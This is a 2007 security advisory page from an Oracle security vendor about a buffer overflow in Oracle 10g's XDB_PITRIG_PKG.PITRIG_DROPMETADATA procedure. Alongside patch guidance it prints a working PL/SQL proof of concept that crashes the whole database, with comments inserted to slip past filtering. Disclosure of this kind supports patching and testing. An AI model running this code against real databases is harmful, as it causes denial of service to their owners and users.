Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap

Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g

Name Crash entire database via SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10g

Systems Affected Oracle 10g

Severity High Risk

Category Buffer Overflow

Vendor URL http://www.oracle.com/

Credit Anonymous

Exploit Full Disclosure

Date 2 Nov 2007 (V 1.00)

Details

Buffer Overflow in SYS.XDB_PITRIG_PKG.PITRIG_DROPMETADATA

Example

SQL>-- Crash Database
declare
larry varchar2(32767);
mary varchar2(32767);
begin
larry:='larryellison';
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
larry:=larry||larry;
mary:='maryann';
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
mary:=mary||mary;
xDb
/*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary , larry);
end;

/

Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2007 or later)

ƒD 2007 by Red-Database-Security GmbH - last update 28-nov-2007

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.